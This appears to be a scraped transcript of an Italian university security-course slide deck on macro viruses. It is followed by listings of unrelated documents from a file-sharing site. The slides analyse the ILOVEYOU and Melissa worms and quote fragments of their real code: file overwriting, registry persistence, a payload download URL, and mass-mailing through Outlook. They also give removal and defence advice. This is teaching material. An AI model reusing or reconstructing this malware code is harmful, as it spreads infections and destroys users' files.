MACRO VIRUS MACRO VIRUS. dsfsdfdsf. Sicurezza su reti. Sicurezza su reti

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "MACRO VIRUS MACRO VIRUS. dsfsdfdsf. Sicurezza su reti. Sicurezza su reti"

Transcript

1 MACRO VIRUS MACRO VIRUS UNIVERSITA DEGLI STUDI DI SALERNO Dott.ssa Barbara Masucci Realizzato da: Cuozzo Piergiuseppe Malangone Alessandro Tipi Virus Definizione di Macro Virus Come agisce un Macro Virus Problemi causati Infezione e rimozione In dettaglio I love You Melissa Come difendersi MACRO VIRUS 1 MACRO VIRUS 2 Cosa sono i virus Tipi di virus Il Virus si distingue da un normale programma per tre caratteristiche fondamentali: E' ospite in un file eseguibile, in un settore di boot,, o in un file di documento. Si autoreplica. Compie tutte queste operazioni in maniera nascosta all'utente. Bombe ANSI Bombe logiche A Cifratura del codice Residenti in memoria Virus companion Virus di macro Virus multipartito Virus del file system Cavalli di Troia Worm Polimorfici MACRO VIRUS 3 MACRO VIRUS 4 Che cos è una MACRO Macro Virus - Definizione Le Macro sono delle procedure automatizzate che permettono di eseguire diverse procedure in sequenza. Esempio di Macro: I macro virus sono generalmente script incorporati all'interno di particolari documenti (come ad esempio MS Word,Excel) Possono essere eseguiti all atto dell apertura di un documento. Il mezzo principale di trasmissione di questi virus sono le . Vanno ad infettare il modello che i programmi utilizzano per creare nuovi documenti. MACRO VIRUS 5 MACRO VIRUS 6 1

2 Macro Virus - Definizione Problemi causati Il file globale Normal.dot mantiene tutte le informazioni su un nuovo documento:la formattazione, il tipo di carattere e la dimensione, ecc.. La capacità del virus di duplicarsi è garantita dalla possibilità di essere eseguito automaticamente al momento dell apertura di un file. Cancellazione di icone. Cancellazione di dati. Occupazione di memoria e blocco del sistema. Salvataggio dei documenti solo in formato.txt MACRO VIRUS 7 MACRO VIRUS 8 Smascherare i Macro Virus Protezione da Macro Aprendo la voce Macro nel menu Strumenti appariranno macro con nomi composti dalle seguenti parole: ToolsMacro, Payload ; AAAZAO, AAAZF; "virus, InsertPayLoad. Per proteggersi dai Macro Virus si deve attivare la protezione da Macro potenzialmente non sicure tramite il menu Strumenti/Macro/Protezione, scegliendo il relativo livello di protezione. Non sempre valido MACRO VIRUS 9 MACRO VIRUS 10 Protezione da Macro Protezione da Macro Se la protezione è attivata, ogni volta che si apre un documento Word contenente una macro, viene visualizzata una finestra di dialogo in cui è possibile scegliere di attivare le macro. Si può anche selezionare l opzione Richiedi salvataggio modello Normal dalla finestra di dialogo Opzioni/Salva nel menu strumenti. MACRO VIRUS 11 MACRO VIRUS 12 2

3 Rimozione Macro Virus più comuni 1. Eliminare il file Normal.dot e sostituirlo con un file normal.dot pulito,tramite il menu Strumenti/Modelli. 2. Attivare la protezione da Macro Virus. 3. Aprire tutti i file di Word. 4. Cancellare il codice virale nell editor di Visul Basic, nei documenti che contengono una macro. 5. Salvare il file con un altro nome, chiudere il tutto ed eliminare il vecchio file. Ripulito il file passare agli altri procedendo nello stesso modo. Word Macro/Concept Word Macro/Atom Word Macro/Bandung Word Macro/Colors Word Macro/Nuclear Melissa I Love You MACRO VIRUS 13 MACRO VIRUS 14 I Love You I Love You - L autore Il mese di Maggio del 2000 è stato segnato dalla comparsa del virus "I Love You. Scritto in Visual Basic Script, linguaggio prossimo a Visual Basic. Si propagava per sotto forma di allegato. Con un nome così accattivante furono molte le vittime a cadere nel tranello. L autore: Onel De Guzman Uno dei migliori studenti dell'ama, una catena di college informatici molto popolare nel Sus-Est asiatico. Lì entrò a far parte di un gruppo chiamato Grammersoft. Sarà proprio quel fatidico nome, ritrovato all'interno dello script di I love you, a convogliare i sospetti su di lui. Ritenuto responsabile di aver creato e immesso in rete il virus informatico più dannoso mai creato. MACRO VIRUS 15 MACRO VIRUS 16 Il codice è composto da 8 subroutines : main() regruns() listadriv infectfiles(folderspec) folderlist (folderspec) regcreate(regkey, regvalue) spreadto () html() e dalle tre funzioni: regget(value) fileexist() folderexist(folderspec) Le prime righe del codice del virus sono dedicate ai commenti e alle impostazioni di alcune variabili che poi saranno usate nel programma. Le due prime righe del code source corrispondono alla firma degli autori del virus, firma che dall'inizio ha fatto pensare che il virus provenisse dalle filippine. rem barok -loveletter(vbe) rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / Group / Manila,Philippines MACRO VIRUS 17 MACRO VIRUS 18 3

4 Neutralizza le difese da macro sub regruns() On Error Resume Next Dim num,downread set fso = CreateObject("Scripting.FileSystemObject ) set file = fso.opentextfile(wscript.scriptfullname,1) vbscopy=file.readall Crea la variabile oggetto per la lettura dei file presenti sul disco La sub main() imposta alcune variabili usate nelle successive routine e crea nell'ordine i tre files "MSKernel32.vbs", "Win32DLL.VBS" e LOVE-LETTER-FOR-YOU.TXT.vbs". Set dirwin = fso.getspecialfolder(0) Set dirsystem = fso.getspecialfolder(1) Set dirtemp = fso.getspecialfolder(2) Set c = fso.getfile(wscript.scriptfullname) c.copy(dirsystem&"\mskernel32.vbs") files c.copy(dirwin&"\win32dll.vbs") c.copy(dirsystem&"\love-letter-for-you.txt.vbs") [...] Main( ) MACRO VIRUS 19 MACRO VIRUS 20 I Love You Codice In seguito vengono lanciate le seguenti routines: regruns() html() La procedura regruns infetta la base dei registri con il fine di spreadto () eseguire il virus ad ogni avvio del PC. listadriv() regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ Run\MSKernel32",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ RunServices\Win32DLL",dirwin&"\Win32DLL.vbs" MACRO VIRUS 21 Individua la directory impostata di default per lo scaricamento dei file da internet e verifica l esistenza del file "WinFAT32.exe" nella directory di Windows. downread="" downread=regget("hkey_current_user\software\ Microsoft\InternetExplorer\Download Directory") Se non esiste prende come default C:\ if (downread="") then downread="c:\" MACRO VIRUS 22 Se esiste "WinFAT32.exe" nella directory di Windows il virus modifica (attraverso il Registro) la Pagina Iniziale di MS Internet Explorer inserendo l indirizzo del file "WIN-BUGFIX.EXE" posto in una sottodirectory del sito La sub verifica poi l'esistenza del file WIN-BUGSFIX.exe nella directory predefinita per il download e imposta il Registro per eseguirlo a ogni avvio del computer. if (fileexist(dirsystem&"\winfat32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj w gvsdf7679njbvyt/win-bugsfix.exe" if (fileexist(downread&"\win-bugsfix.exe")=0) then regcreate"hkey_local_machine\software\microsoft\windows\current Version\Run\WIN- BUGSFIX",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StartPage","about:blank" Dopodiché la Pagina Iniziale di Explorer diventa "about:blank" end sub MACRO VIRUS 23 MACRO VIRUS 24 4

5 Verifica i driver presenti sul disco e per ogni unità esegue la funzione folderlist( ). listdriv ( ) Infectfiles( ) Sostituisce i file: Script,JPEG, mp3 con una copia del virus. Ricerca il programma mirc al fine di propagarsi ad altri utenti. folderlist( ) Chiama la funzione infectfiles ( ) if (ext="vbs") or (ext="vbe") then set ap=fso.opentextfile(f1.path,2,true) ap.write vbscopy Individua e cancella tutti i files con estensione:*.vbs, *.vbe ap.close MACRO VIRUS 25 MACRO VIRUS 26 Idem con i file con estensione.css,.whs e js che sono cancellati e rimpiazzati da file con lo stesso nome ma aventi l'estensione.vbs elseif(ext="jpg") or (ext="jpeg") then set ap=fso.opentextfile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.getfile(f1.path) cop.copy(f1.path&".vbs") fso.deletefile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.createtextfile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.getfile(f1.path) att.attributes=att.attributes+2 MACRO VIRUS 27 Il virus I Love You testa infine il nostro computer per verificare la presenza del programma mirc, creando nella sua cartella il file SCRIPT.INI, contenente i comandi per inviare una pagina html contenente la copia del virus. if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set [scriptini=fso.createtextfile(folderspec&"\script.ini") scriptini.writeline "[script]" scriptini.writeline ";mirc Script" scriptini.writeline "; Please dont edit this script... mirc will corrupt,... MACRO VIRUS 28 La routine html() crea una pagina HTML contente il codice virale nella directory di Windows con il nome "LOVE-LETTER-FOR- YOU.HTM", che sarà trasmessa ai vari corrispondenti via IRC.. Questa pagina HTML contiene un ActiveX (vbscript) con il fine di richiamare l'attenzione della vittima. MACRO VIRUS 29 regcreate( )Imposta i registri di sistema spreadto ( ) crea il messaggio contenente il virus e lo spedisce a tutti i membri della rubrica. regv=regedit.regread("hkey_current_user\software\microsoft\wab\"&a) if (regv="") then regv=1 Il virus richiama l'applicazione Wab.exe, una rubrica di Outlook. if (int(a.addressentries.count)>int(regv)) then for ctrentries=1 to a.addressentries.count maled=a.addressentries(x) reagd="" regad=regedit.readread("hkey_current_user\software\microsoft\wab\"&malead) if (regad="") then MACRO VIRUS 30 5

6 I Love You - Rimozione Viene creato il messaggio contenente il virus e spedito a tutti i membri della rubrica. Vediamo inoltre che il soggetto che contiene il virus e "I Love You", e che il corpo del messaggio, vale a dire il testo è "Kindly check the attacched loveletter coming from me". set male=out.createitem(0) male.recipients.add(maled) male.subject = "ILOVEYOU" male.body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.attachments.add(dirsystem&"\love-letter-for-you.txt.vbs") male.send regedit.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Wab\ "&malead,1,"reg_dword" MACRO VIRUS 31 Rimuovere i file: LOVE-LETTER-FOR-YOU.HTM (dalla cartella di sistema) WIN-BUGSFIX.EXE, WINFAT32.EXE (dalla cartella dei file scaricati da internet).vbs (da tutte le cartella del sistema) SCRIPT.INI (nella cartella di mirc) MACRO VIRUS 32 Melissa Melissa Diffusione e attivazione Si tratta di un virus macro di Word trasmesso tramite posta elettronica in un documento Word allegato. W97 M/Melissa.A Il messaggio contiene: La dicitura "Important Message From "nome utente" nel campo dell'oggetto. Il testo "Here is that document you asked for... don't show anyone else ;-)" Diffusione tramite posta elettronica con un file list.doc allegato. E in grado di propagarsi inviando messaggi di posta elettronica ai primi 50 indirizzi in rubrica. Il virus possiede anche una particolare routine la cui azione viene eseguita solo nel caso in cui il numero del giorno corrisponda a quello dei minuti. MACRO VIRUS 33 MACRO VIRUS 34 Melissa Descrizione tecnica Melissa Trasmissione Nome della macro infetta in cui vengono ignorati gli errori quando Melissa è in esecuzione e neutralizzate le difese di Word. Private Sub Document_Open() On Error Resume Next End Sub If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for... don't show anyone else ;-)" Si autospedisce ai primi 50 indirizzi nella rubrica Nel "soggetto" (subject) del messaggio viene inserito il testo "Important Message From [UsareName]" (UserName è una variabile e conterrà il nome dell'utente di Outlook). Nel corpo del messaggio viene scritto il testo "Here is that document you asked for... don't show anyone else ;-)" MACRO VIRUS 35 MACRO VIRUS 36 6

7 Melissa Trasmissione BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff Allega il documento infetto alla posta e poi spedisce l . System.PrivateProfileString("", "HKEY_CURRENT_USER \Software\Microsoft \Office\", "Melissa?") = "... by Kwyjibo " Prima dell'invio, il virus controlla il Registro di sistema ricercando una chiave particolare. Il codice del virus contiene un modulo chiamato "Melissa", nel quale è presente una funzione automatica: "Document_Open" "Document_Close" Il virus infetta il modello NORMAL.DOT quando vengono aperti dei documenti infetti e si diffonde ad altri documenti quando questi ultimi vengono chiusi. MACRO VIRUS 37 MACRO VIRUS 38 Infetta il documento corrente... Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1=NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name<>"Melissa" Then If ADCL > 0 Then ADI1.CodeModule.DeleteLines1, ADCL SetToInfect= ADI1 ADI1.Name = "Melissa" DoAD = True MACRO VIRUS 39 Copia il virus nella macro Document_Close... If Dont = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines1 Loop ToInfect.CodeModule.AddFromString("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLinesBGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop MACRO VIRUS 40 Copia il virus nella macro Document_Open... If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines Loop ToInfect.CodeModule.AddFromString("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop Salva il documento infetto WORD/Melissa written by Kwyjibo Works in both Word 2000 and Word 97 Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! Word -> Word 97 <--> Word it's a new age! CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1,ActiveDocument.Name, "Document"=False)Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1,ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved=True Commenti MACRO VIRUS 41 MACRO VIRUS 42 7

8 Melissa Trigger Routine Melissa Come difendersi Il Virus contiene anche una speciale routine. If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub Verificare che la protezione da virus macro di Office sia attivata. Eseguire un programma anti-virus aggiornato e controllare il sistema con frequenza. Eliminare o rinominare il file Normal.dot. Questo modello globale di Word viene ricreato automaticamente all'avvio di Word. MACRO VIRUS 43 MACRO VIRUS 44 Come difendersi sicura Antivirus Profilassi informatica sicura Molti virus sono allegati ai messaggi con nomi invitanti oppure sono infilati dentro al codice HTML dei messaggi stessi sotto forma di script. Alcuni metodi di mascheramento: File Spoofing R er Anonimi Verificare le regole di base del client di posta Se necessario utilizzare programmi specifici PGP Firma digitale tramite società dedicate Registrare un account con transazione protetta con crittografia e passphrase su MACRO VIRUS 45 MACRO VIRUS 46 Tipologie di antivirus-principi di funzionamento Tipologie di antivirus-principi di funzionamento Software scritti per intercettare, prevenire ed eliminare l'azione di virus e di altri tipi di malware. In genere vi sono tre tipi di AntiVirus:Monitoraggio, Scanner e di Rilevamento. Altri tipi di protezione possono essere da scrittura, lettura,... DI MONITORAGGIO Tentano di prevenire un'infezione controllando attività sospette (riformattare un disco,...). SCANNER Ricercano nel sistema (file, memoria e settori di avvio) le stringhe caratteristiche dei virus conosciuti. DI RILEVAMENTO Verificatori dell integrità (utile per la rilevazione di virus che modificano la struttura dei file). Tecnica euristica (ricerca le istruzioni e i funzionamenti sospetti) Programmi di decrittazione generica (utilizzati per rilevare i virus criptati e polimorfici). MACRO VIRUS 47 MACRO VIRUS 48 8

9 Tipologie di antivirus-l attacco dei retrovirus Tipologie di antivirus-l attacco dei retrovirus Un problema molto importante riguarda l'efficienza dell'antivirus a respingere attacchi di tipo retrovirale. Per attacchi "retrovirali", si intendono quelli in cui il virus è in grado di aggirare e disattivare l'antivirus, o comunque di renderlo inefficace nei confronti del virus stesso. A prescindere dalle caratteristiche di ogni singolo antivirus, le componenti essenziali sono le seguenti: Interfaccia grafica(programma o servizio eseguibile.exe) Driver di scansione (driver di sistema.vxd, o.sys) Come mai è possibile che un worm che opera come un programma eseguibile, possa in qualche maniera compromettere la sicurezza di un antivirus? I due moduli sono in continuo contatto tra di loro e quando il modulo eseguibile viene disabilitato anche la parte relativa al driver smette di funzionare. MACRO VIRUS 49 MACRO VIRUS 50 Profilassi informatica Profilassi informatica (2) Non aprire file con estensioni 386, BIN, CMD, DEV, DLL, DOC, DOT, EXE, INF MD?, MPP, MPT, OBT, OLE, XL?, VXD, OVL, PP?, POT, PIF SCR, SHS, SYS, VBS, XPT senza averli controllati con un antivirus aggiornato. Utilizzare un server di posta che faccio un controllo antivirus. Disattivare qualsiasi funzione di visualizzazione automatica. Installare e tenere aggiornato un firewall. Compiere Backup regolari Verificare ogni nuovo software o dischetto Prepararsi al sicuro un disco di Boot pulito per compiere la scansione Prestare attenzione a nuovi comportamenti del PC: Improvvisi crash del sistema Quando un programma generico di monitoraggio dà un allarme L'impossibilità di avviare il proprio computer con messaggi del tipo "missing operating system Comportamenti inusuali MACRO VIRUS 51 MACRO VIRUS 52 9

La diffusione dei virus informatici nel mondo ad Agosto 2001 in base alla percentuale di infezioni sul totale

La diffusione dei virus informatici nel mondo ad Agosto 2001 in base alla percentuale di infezioni sul totale Macro Virus Bruno Marisa Radica Diego Sessa Clelia Realizzato Da: MARISA.BRUNO@poste. it diego.radica@libero..radica@libero.itit clelia28@interfree.itit Macro Virus 1 Che cos è un virus. Definizione di

Dettagli

Talento LAB 8.1 - LA GESTIONE DEI VIRUS I VIRUS INFORMATICI. In questa lezione imparerete a:

Talento LAB 8.1 - LA GESTIONE DEI VIRUS I VIRUS INFORMATICI. In questa lezione imparerete a: LAB 8.1 - LA GESTIONE DEI VIRUS In questa lezione imparerete a: Definire cos è un virus informatico e quali possono essere i suoi effetti, Stabilire i vari metodi di contagio, Comprendere i vantaggi di

Dettagli

Modulo 1. Concetti di base della Tecnologia dell Informazione ( Parte 1.7) Rielaborazione dal WEB: prof. Claudio Pellegrini - Sondrio

Modulo 1. Concetti di base della Tecnologia dell Informazione ( Parte 1.7) Rielaborazione dal WEB: prof. Claudio Pellegrini - Sondrio Modulo 1 Concetti di base della Tecnologia dell Informazione ( Parte 1.7) Rielaborazione dal WEB: prof. Claudio Pellegrini - Sondrio La sicurezza dei sistemi informatici Tutti i dispositivi di un p.c.

Dettagli

Le reti di calcolatori

Le reti di calcolatori Le reti di calcolatori 106 Le reti di calcolatori 1 Una rete è un complesso insieme di sistemi di elaborazione connessi tra loro tramite collegamenti fisici (linee telefoniche, cavi dedicati, etc.) o con

Dettagli

Come difendersi dai VIRUS

Come difendersi dai VIRUS Come difendersi dai VIRUS DEFINIZIONE Un virus è un programma, cioè una serie di istruzioni, scritte in un linguaggio di programmazione, in passato era di solito di basso livello*, mentre con l'avvento

Dettagli

CORSO EDA Informatica di base. Sicurezza, protezione, aspetti legali

CORSO EDA Informatica di base. Sicurezza, protezione, aspetti legali CORSO EDA Informatica di base Sicurezza, protezione, aspetti legali Rischi informatici Le principali fonti di rischio di perdita/danneggiamento dati informatici sono: - rischi legati all ambiente: rappresentano

Dettagli

Difenditi dai Malware

Difenditi dai Malware con la collaborazione di Difenditi dai Malware Pensi che il PHISHING sia solo un tipo di pesca? Pensi che i COOKIE siano solo biscotti? Pensi che un VIRUS sia solo un raffreddore? Difenditi dai Malware

Dettagli

Università Roma TRE. Sicurezza. Sicurezza informatica. Argomenti trattati. Fondamenti di sicurezza informatica

Università Roma TRE. Sicurezza. Sicurezza informatica. Argomenti trattati. Fondamenti di sicurezza informatica Università Roma TRE Sicurezza informatica Virus, attacchi e violazioni, crittografia Generalmente, il termine sicurezza indica la condizione di chi ha messo in atto misure di protezione idonee a contrastare

Dettagli

Concetti di base sul Software dei computer. Unitre Anno 2014-2015

Concetti di base sul Software dei computer. Unitre Anno 2014-2015 Concetti di base sul Software dei computer Unitre Anno 2014-2015 Software Un software è sempre un programma scritto in un linguaggio di programmazione ad alto livello che contiene una lista di istruzioni.

Dettagli

Sicurezza dei file Le protezioni nei programmi

Sicurezza dei file Le protezioni nei programmi Sicurezza dei file Le protezioni nei programmi Attivare/disattivare le impostazioni di sicurezza delle macro. Una macro è un insieme d istruzioni che il computer interpreta una dopo l altra e traduce in

Dettagli

http://puntoeduft.indire.it/materialic/modulo1/modulo_1_pa_2.html PDF created with FinePrint pdffactory trial version http://www.pdffactory.

http://puntoeduft.indire.it/materialic/modulo1/modulo_1_pa_2.html PDF created with FinePrint pdffactory trial version http://www.pdffactory. Pagina 1 di 9 Virus e antivirus Introduzione Il termine virus in informatica indica una porzione di codice che ha la caratteristica di autoreplicarsi e inserire se stesso in file eseguibili preesistenti

Dettagli

Il Malware (1) malware software computer malicious software malware

Il Malware (1) malware software computer malicious software malware I virus informatici Il Malware (1) Si definisce malware un qualsiasi software creato con il solo scopo di creare danni più o meno estesi al computer su cui viene eseguito. Il termine deriva dalla contrazione

Dettagli

Uso del computer e gestione dei file

Uso del computer e gestione dei file 1 di 1 Uso del computer e gestione dei file Argomenti trattati: Sistema operativo Microsoft Windows: interfaccia grafica e suoi elementi di base Avvio e chiusura di Windows Le FINESTRE e la loro gestione:

Dettagli

I.T.C.G. DE SIMONI PROGETTO ECDL

I.T.C.G. DE SIMONI PROGETTO ECDL I.T.C.G. DE SIMONI PROGETTO ECDL USO DEL COMPUTER E GESTIONE FILES Referente e tutor Prof.ssa Annalisa Pozzi Tutor lezioni Prof. Claudio Pellegrini 2.3 Utilità 2.3.1 Compressione dei files 2.3.1.1 Comprendere

Dettagli

www.intego.com PL/ATTIVA/IT/1009

www.intego.com PL/ATTIVA/IT/1009 www.intego.com PL/ATTIVA/IT/1009 Esistono virus per Mac OS X? Esistono virus che colpiscono Mac OS X? Poiché di recente la stampa informatica ha discusso molto riguardo a virus e computer Mac, abbiamo

Dettagli

CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS CARATTERISTICHE - TIPI PROTEZIONE

CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS CARATTERISTICHE - TIPI PROTEZIONE - CACCIA AL VIRUS! SAPER RICONOSCERE ED ELIMINARE VIRUS CARATTERISTICHE - TIPI PROTEZIONE Di cosa parleremo Definizioni di virus e malware. Danni che i virus possono provocare. Rimedi che possiamo applicare.

Dettagli

Piccola guida a VBA per Word

Piccola guida a VBA per Word Piccola guida a VBA per Word La differenza tra VBA (Visual Basic for Applications) e VB6 (Visual Basic versione 6) Il modello di un documento Word Il progetto di un documento Word Come creare un nuovo

Dettagli

SOFTWARE L ACCENSIONE DEL COMPUTER

SOFTWARE L ACCENSIONE DEL COMPUTER SOFTWARE Con software si intende l insieme delle istruzioni che permettono il funzionamento dell hardware; il concetto di software, o programma che dir si voglia, è un concetto generale ed ampio: si distingue,

Dettagli

> P o w e r D R E A M < Catalogazione Sogni

> P o w e r D R E A M < Catalogazione Sogni > P o w e r D R E A M < Catalogazione Sogni Guida rapida all utilizzo del software (rev. 1.4 - lunedì 29 ottobre 2012) INSTALLAZIONE, ATTIVAZIONE E CONFIGURAZIONE INIZIALE ESECUZIONE DEL SOFTWARE DATI

Dettagli

Protezione dei dati. Un hard disk contiene dati e programmi I dati sono molto più importanti dei programmi

Protezione dei dati. Un hard disk contiene dati e programmi I dati sono molto più importanti dei programmi Protezione dei dati Protezione dei dati Un hard disk contiene dati e programmi I dati sono molto più importanti dei programmi Installazione di Office: 0.5 ore Tesi di laurea, ricerca, progetto AutoCAD:

Dettagli

BOLLETTINO DI SICUREZZA INFORMATICA

BOLLETTINO DI SICUREZZA INFORMATICA STATO MAGGIORE DELLA DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio CERT Difesa CC BOLLETTINO DI SICUREZZA INFORMATICA N. 1/2009 Il bollettino può essere

Dettagli

AVG File Server 2012. Manuale per l'utente. Revisione documento 2012.04 (1/4/2012)

AVG File Server 2012. Manuale per l'utente. Revisione documento 2012.04 (1/4/2012) AVG File Server 2012 Manuale per l'utente Revisione documento 2012.04 (1/4/2012) Copyright AVG Technologies CZ, s.r.o. Tutti i diritti riservati. Tutti gli altri marchi appartengono ai rispettivi proprietari.

Dettagli

IFTS anno formativo 2012-2103 Tecnico superiore per il monitoraggio e la gestione del territorio e dell ambiente

IFTS anno formativo 2012-2103 Tecnico superiore per il monitoraggio e la gestione del territorio e dell ambiente IFTS anno formativo 2012-2103 Tecnico superiore per il monitoraggio e la gestione del territorio e dell ambiente PREPARAZIONE ECDL Modulo 2 : Usare il computer e gestire file Esperto: Salvatore Maggio

Dettagli

F-Secure Anti-Virus for Mac 2015

F-Secure Anti-Virus for Mac 2015 F-Secure Anti-Virus for Mac 2015 2 Sommario F-Secure Anti-Virus for Mac 2015 Sommario Capitolo 1: Operazioni preliminari...3 1.1 Gestione abbonamento...4 1.2 Come verificare che il computer sia protetto...4

Dettagli

ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE

ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE PREMESSA La presente guida è da considerarsi come aiuto per l utente per l installazione e configurazione di Atollo Backup. La guida non vuole approfondire

Dettagli

AVG File Server 2013. Manuale per l'utente. Revisione documento 2013.01 (20.11.2012)

AVG File Server 2013. Manuale per l'utente. Revisione documento 2013.01 (20.11.2012) AVG File Server 2013 Manuale per l'utente Revisione documento 2013.01 (20.11.2012) Copyright AVG Technologies CZ, s.r.o. Tutti i diritti riservati. Tutti gli altri marchi appartengono ai rispettivi proprietari.

Dettagli

Evoluzione servizi di Post@ Elettronic@

Evoluzione servizi di Post@ Elettronic@ 1 Ministero delle Infrastrutture e dei Trasporti mi Dicembre 2008 SISTEMI INFORMATIVI E STATISTICI Evoluzione servizi di Post@ Elettronic@ ced.nomentana@infrastrutture.gov.it 1. Il nuovo dominio @mit.gov.it

Dettagli

Elementi di sicurezza 1.5

Elementi di sicurezza 1.5 Elementi di sicurezza 1.5 UserID e password Nei computer possono essere raccolti molti dati che possono avere un valore economico o personale notevolissimo Si pone allora il problema di impedire l accesso

Dettagli

Che cosa è un VIRUS?

Che cosa è un VIRUS? Virus & Antivirus Virus Nella sicurezza informatica un virus è un software, appartenente alla categoria dei malware, che è in grado, una volta eseguito, di infettare dei file in modo da riprodursi facendo

Dettagli

Antivirus Virus, worm e batteri

Antivirus Virus, worm e batteri Pagina 1 di 15 Antivirus Virus, worm e batteri In questa lezione tratteremo della problematica di come proteggere i nostri sistemi informativi dai virus. I virus costituiscono oggigiorno una grossa minaccia

Dettagli

Uso del computer e gestione dei file

Uso del computer e gestione dei file Uso del computer e gestione dei file 2.1 L AMBIENTE DEL COMPUTER 1 2 Primi passi col computer Avviare il computer Spegnere correttamente il computer Riavviare il computer Uso del mouse Caratteristiche

Dettagli

Guida per l utente di Norton AntiVirus

Guida per l utente di Norton AntiVirus Guida per l utente di Norton AntiVirus Guida per l utente di Norton AntiVirus Il software descritto nel presente manuale viene fornito nell ambito di un contratto di licenza d uso e può essere utilizzato

Dettagli

DR.Web Enterprise Security Suite. Guida Rapida di Installazione

DR.Web Enterprise Security Suite. Guida Rapida di Installazione DR.Web Enterprise Security Suite Guida Rapida di Installazione 1 Dr.Web Enterprise Security Suite è la versione centralizzata del software Antivirus Dr.Web destinato a installazioni su reti di Piccole\Medie

Dettagli

GUIDA BASE ALLA NAVIGAZIONE SICURA

GUIDA BASE ALLA NAVIGAZIONE SICURA PRECAUZIONI INTERNET GUIDA BASE ALLA NAVIGAZIONE SICURA INTRODUZIONE Prevenire è meglio che curare Spesso si parla di programmi che facciano da protezione antivirus, o che eseguano scansioni antimalware

Dettagli

Capitolo 1: Operazioni preliminari...3

Capitolo 1: Operazioni preliminari...3 F-Secure Anti-Virus for Mac 2014 Sommario 2 Sommario Capitolo 1: Operazioni preliminari...3 1.1 Operazioni da effettuare in seguito all'installazione...4 1.1.1 Gestione abbonamento...4 1.1.2 Come aprire

Dettagli

bigini@cefriel.it http://www.cefriel.it/ns

bigini@cefriel.it http://www.cefriel.it/ns bigini@cefriel.it http://www.cefriel.it/ns Virus Macro Virus Worm Un programma in grado di riprodurre autonomamente il proprio codice, inserendolo in quello di un altro programma, in modo tale che questo

Dettagli

Le reti Sicurezza in rete

Le reti Sicurezza in rete Le reti Sicurezza in rete Tipi di reti Con il termine rete si intende un insieme di componenti, sistemi o entità interconnessi tra loro. Nell ambito dell informatica, una rete è un complesso sistema di

Dettagli

Introduzione BENVENUTO!

Introduzione BENVENUTO! 1 Introduzione Grazie per aver scelto Atlantis Antivirus. Atlantis Antivirus ti offre una protezione eccellente contro virus, Trojan, worms, dialers, codici maligni e molti altri pericoli informatici.

Dettagli

Sophos Endpoint Security and Control Guida di avvio per computer autonomi

Sophos Endpoint Security and Control Guida di avvio per computer autonomi Sophos Endpoint Security and Control Guida di avvio per computer autonomi Sophos Endpoint Security and Control versione 9 Sophos Anti-Virus per Mac OS X, versione 7 Data documento: ottobre 2009 Sommario

Dettagli

INTRODUZIONE AI SISTEMI OPERATIVI

INTRODUZIONE AI SISTEMI OPERATIVI INTRODUZIONE AI SISTEMI OPERATIVI Il sistema operativo è il software che permette l esecuzione di programmi applicativi e lo sviluppo di nuovi programmi. CARATTERISTICHE Gestisce le risorse hardware e

Dettagli

Il tuo manuale d'uso. KASPERSKY ANTI-VIRUS PERSONAL 5.0 http://it.yourpdfguides.com/dref/3931638

